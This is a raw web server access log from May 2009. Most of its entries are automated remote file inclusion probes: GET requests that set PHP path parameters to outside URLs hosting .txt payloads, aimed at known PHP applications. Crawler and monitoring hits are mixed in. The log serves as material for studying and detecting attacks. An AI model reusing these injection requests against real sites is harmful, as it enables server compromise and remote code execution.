110.45.144.106 - - [20/May/2009:06:51:09 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.135.14 - - [20/May/2009:06:51:15 -0400] "GET /logs/access_log.Q108072400//PhpLinkExchange/bits_listings.php?svr_rootP=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:06:51:16 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:06:51:16 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:06:51:24 -0400] "GET /logs/access_log.Q108072400//PhpLinkExchange/bits_listings.php?svr_rootP=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:06:51:24 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:06:51:24 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
88.84.128.40 - - [20/May/2009:06:51:34 -0400] "GET /logs/access_log.Q108072400//PhpLinkExchange/bits_listings.php?svr_rootP=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:06:51:34 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:06:51:35 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
208.64.202.134 - - [20/May/2009:06:52:08 -0400] "GET /logs/access_log.Q108102400/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:52:14 -0400] "GET /logs/access_log.Q108102400/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:52:27 -0400] "GET /logs//?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 2093 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:52:27 -0400] "GET //?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:52:35 -0400] "GET /logs/access_log.Q109050700%20%20//?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
155.212.232.66 - - [20/May/2009:06:53:04 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [20/May/2009:06:53:04 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [20/May/2009:06:53:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [20/May/2009:06:53:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
110.45.144.106 - - [20/May/2009:06:53:33 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:53:37 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.119.103.12 - - [20/May/2009:06:53:54 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootP=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/May/2009:06:54:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.135.14 - - [20/May/2009:06:54:34 -0400] "GET /logs/access_log.Q108072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:06:54:35 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:06:54:35 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
89.108.85.158 - - [20/May/2009:06:54:42 -0400] "GET /logs/error_log.Q109050500//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.803"
89.108.85.158 - - [20/May/2009:06:54:42 -0400] "GET //phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
89.108.85.158 - - [20/May/2009:06:54:43 -0400] "GET /logs//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
110.45.144.106 - - [20/May/2009:06:54:46 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:54:51 -0400] "GET /logs/access_log.Q109050300%20%20//?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.119.103.12 - - [20/May/2009:06:55:19 -0400] "GET /logs/access_log.Q108072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:06:55:19 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:06:55:19 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
88.84.128.40 - - [20/May/2009:06:55:33 -0400] "GET /logs/access_log.Q108072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
209.172.33.230 - - [20/May/2009:06:55:34 -0400] "GET /logs/access_log.Q109051000//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
209.172.33.230 - - [20/May/2009:06:55:34 -0400] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 220 "-" "libwww-perl/5.812"
209.172.33.230 - - [20/May/2009:06:55:34 -0400] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.812"
88.84.128.40 - - [20/May/2009:06:55:34 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:06:55:34 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
209.172.33.230 - - [20/May/2009:06:55:40 -0400] "GET /logs/error_log.Q109050600//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
89.108.85.158 - - [20/May/2009:06:56:58 -0400] "GET //phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
78.40.224.155 - - [20/May/2009:06:57:41 -0400] "GET /logs/access_log.Q109051000//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
78.40.224.155 - - [20/May/2009:06:57:41 -0400] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:06:57:42 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
78.40.224.155 - - [20/May/2009:06:57:42 -0400] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
78.40.224.155 - - [20/May/2009:06:57:55 -0400] "GET /logs/error_log.Q109050600//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:06:57:57 -0400] "GET /logs/access_log.Q108090200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:06:57:57 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:06:57:57 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
88.84.128.40 - - [20/May/2009:06:59:10 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootP=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
124.0.73.2 - - [20/May/2009:06:59:28 -0400] "GET /logs/access_log.Q108090200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
87.106.135.14 - - [20/May/2009:06:59:48 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootP=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
218.146.231.207 - - [20/May/2009:06:59:58 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:07:00:01 -0400] "GET /logs/access_log.Q109050700//?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
89.108.85.158 - - [20/May/2009:07:00:34 -0400] "GET /logs/access_log.Q108112400//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.803"
216.119.103.12 - - [20/May/2009:07:00:38 -0400] "GET /logs/access_log.Q108082500//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
172.16.1.157 - - [20/May/2009:07:00:44 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:07:00:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:07:00:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
218.27.203.107 - - [20/May/2009:07:00:51 -0400] "GET /logs/access_log.Q109050300//?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:07:01:47 -0400] "GET //src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:07:01:47 -0400] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:07:01:47 -0400] "GET /logs/access_log.Q108090300//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:07:01:49 -0400] "GET //src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:07:01:49 -0400] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:07:01:49 -0400] "GET /logs/access_log.Q108090300//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:07:02:06 -0400] "GET /logs/access_log.Q108110900//components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.147.29.190 - - [20/May/2009:07:02:07 -0400] "GET //components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 220 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
87.106.135.14 - - [20/May/2009:07:02:12 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
220.181.7.97 - - [20/May/2009:07:02:21 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.38 - - [20/May/2009:07:02:54 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.23.158.226 - - [20/May/2009:07:03:02 -0400] "GET //src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:07:03:02 -0400] "GET /logs/access_log.Q108090300//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:07:03:04 -0400] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:07:03:04 -0400] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:07:03:04 -0400] "GET /logs/access_log.Q108090300//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:07:03:04 -0400] "GET //src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
124.217.252.20 - - [20/May/2009:07:03:30 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jsgok.com/technote7//data/mildnetid.txt%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.820"
124.217.252.20 - - [20/May/2009:07:03:30 -0400] "GET /logs/access_log.Q108090200%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://jsgok.com/technote7//data/mildnetid.txt%0D?? HTTP/1.1" 404 244 "-" "libwww-perl/5.820"
124.217.252.20 - - [20/May/2009:07:03:30 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://jsgok.com/technote7//data/mildnetid.txt%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.820"
65.23.158.226 - - [20/May/2009:07:03:32 -0400] "GET /logs/access_log.Q109040200//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:07:03:33 -0400] "GET /logs/access_log.Q109040200//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
124.217.252.20 - - [20/May/2009:07:03:42 -0400] "GET /logs/error_log.Q108102500%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://jsgok.com/technote7//data/mildnetid.txt%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.820"
217.147.29.190 - - [20/May/2009:07:04:15 -0400] "GET //components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:07:04:15 -0400] "GET /logs/access_log.Q108120600%20%20//components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:07:04:15 -0400] "GET /logs//components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
88.84.128.40 - - [20/May/2009:07:04:19 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
217.147.29.190 - - [20/May/2009:07:04:22 -0400] "GET /logs/access_log.Q108112400%20%20//components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:07:04:25 -0400] "GET /logs/access_log.Q108090400//skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
87.106.135.14 - - [20/May/2009:07:05:10 -0400] "GET /logs/access_log.Q108090200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:07:05:11 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:07:05:11 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
172.16.1.157 - - [20/May/2009:07:05:15 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:07:05:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:07:05:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
208.64.202.134 - - [20/May/2009:07:05:23 -0400] "GET /logs/access_log.Q109040200//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:07:05:23 -0400] "GET /logs/access_log.Q109040200//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
72.30.142.171 - - [20/May/2009:07:05:40 -0400] "GET /logs/error_log.Q107110800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [20/May/2009:07:05:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [20/May/2009:07:05:53 -0400] "GET //components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:07:05:53 -0400] "GET /logs//components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:07:05:53 -0400] "GET /logs/access_log.Q108120600%20%20//components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:07:05:54 -0400] "GET /logs/access_log.Q108112400%20%20//components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:07:05:59 -0400] "GET /images/download_osteotomes.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
65.23.158.226 - - [20/May/2009:07:06:02 -0400] "GET /logs/access_log.Q108090300%20%20//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:07:06:06 -0400] "GET /logs/access_log.Q108090300%20%20//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:07:06:16 -0400] "GET /logs//components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:07:06:16 -0400] "GET //components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:07:06:16 -0400] "GET /logs/access_log.Q108120600%20%20//components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:07:06:16 -0400] "GET /logs/access_log.Q108112400%20%20//components/errors.php?error=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:07:06:27 -0400] "GET /logs/access_log.Q109040200%20%20//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
62.146.68.61 - - [20/May/2009:07:06:29 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.146.68.61 - - [20/May/2009:07:06:29 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
62.146.68.61 - - [20/May/2009:07:06:29 -0400] "GET /logs/access_log.Q108061500/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:07:06:30 -0400] "GET /logs/access_log.Q109040200%20%20//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
62.146.68.61 - - [20/May/2009:07:06:30 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
62.146.68.61 - - [20/May/2009:07:06:30 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.146.68.61 - - [20/May/2009:07:06:30 -0400] "GET /logs/access_log.Q108061500/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.122.26.5 - - [20/May/2009:07:06:59 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.26.5 - - [20/May/2009:07:06:59 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
